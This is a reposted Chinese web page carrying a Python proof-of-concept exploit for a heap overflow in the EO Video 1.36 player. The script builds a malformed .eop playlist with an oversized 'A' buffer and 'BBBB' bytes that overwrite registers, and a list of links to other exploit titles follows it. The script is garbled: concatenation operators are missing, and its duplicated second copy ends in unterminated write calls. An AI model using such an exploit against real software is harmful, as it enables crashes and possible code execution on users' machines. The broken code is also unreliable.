您现在的位置是:网站首页> 编程资料编程资料
EO Video 1.36 Local Heap Overflow DOS / PoC _Exploit_网络安全_
2023-05-24
632人已围观
简介 EO Video 1.36 Local Heap Overflow DOS / PoC _Exploit_网络安全_
#!/usr/bin/python
# --------------------------------------------------------------
# EO Video v1.36 Heap Overflow local PoC/DoS exploit
# *.eop playlist file in buffer overflow
# Other versions may be vulnerable too...
# --------------------------------------------------------------
# Vulnerability discovered and coded by Muris Kurgas aka j0rgan
# jorganwd [at] gmail [dot] com
# --------------------------------------------------------------
#
# Who uses this crap of player anyway? :)
# --------------------------------------------------------------
# EAX 42424242
# EDX 42424242
# -------------------------------------------------------------- import os bafer = '\x41'* 700 '\x42' * 4 print "Spit me out, all bright and shiny! :)"
fileHandle = open ( 'plejlista.eop', 'w' )
fileHandle.write ('\n\n\n\nnesto \n1 \n ')
fileHandle.write (' \n\nnesto \n1 \n \n \n\n ')
fileHandle.write ('' bafer ' ')
fileHandle.write ('0 \n0 \n\n-1 \n-1 \n \n ')
fileHandle.write ('30216 \n0 \n ')
fileHandle.write (' \n \n \n')
fileHandle.close ()
# --------------------------------------------------------------
# EO Video v1.36 Heap Overflow local PoC/DoS exploit
# *.eop playlist file in
# Other versions may be vulnerable too...
# --------------------------------------------------------------
# Vulnerability discovered and coded by Muris Kurgas aka j0rgan
# jorganwd [at] gmail [dot] com
# --------------------------------------------------------------
#
# Who uses this crap of player anyway? :)
# --------------------------------------------------------------
# EAX 42424242
# EDX 42424242
# -------------------------------------------------------------- import os bafer = '\x41'* 700 '\x42' * 4 print "Spit me out, all bright and shiny! :)"
fileHandle = open ( 'plejlista.eop', 'w' )
fileHandle.write ('
fileHandle.write ('
fileHandle.write ('
fileHandle.write ('
fileHandle.write ('
fileHandle.write ('
fileHandle.close ()
相关内容
- WS_FTP Home/Professional FTP Client Remote Format String PoC _Exploit_网络安全_
- FlashGet 1.9.0.1012 (FTP PWD Response) BOF Exploit (safeseh) _Exploit_网络安全_
- webEdition CMS (we_objectID) Blind SQL Injection Exploit _Exploit_网络安全_
- VMware Workstation (hcmon.sys 6.0.0.45731) Local DoS Vulnerability _Exploit_网络安全_
- Anzio Web Print Object _Exploit_网络安全_
- Ultrastats _Exploit_网络安全_
- Mole Group Real Estate Script _Exploit_网络安全_
- trixbox (langChoice) Local File Inclusion Exploit (connect-back) _Exploit_网络安全_
- Boonex Dolphin 6.1.2 Multiple Remote File Inclusion Vulnerabilities _Exploit_网络安全_
- BrewBlogger 2.1.0.1 Arbitrary Add Admin Exploit _Exploit_网络安全_
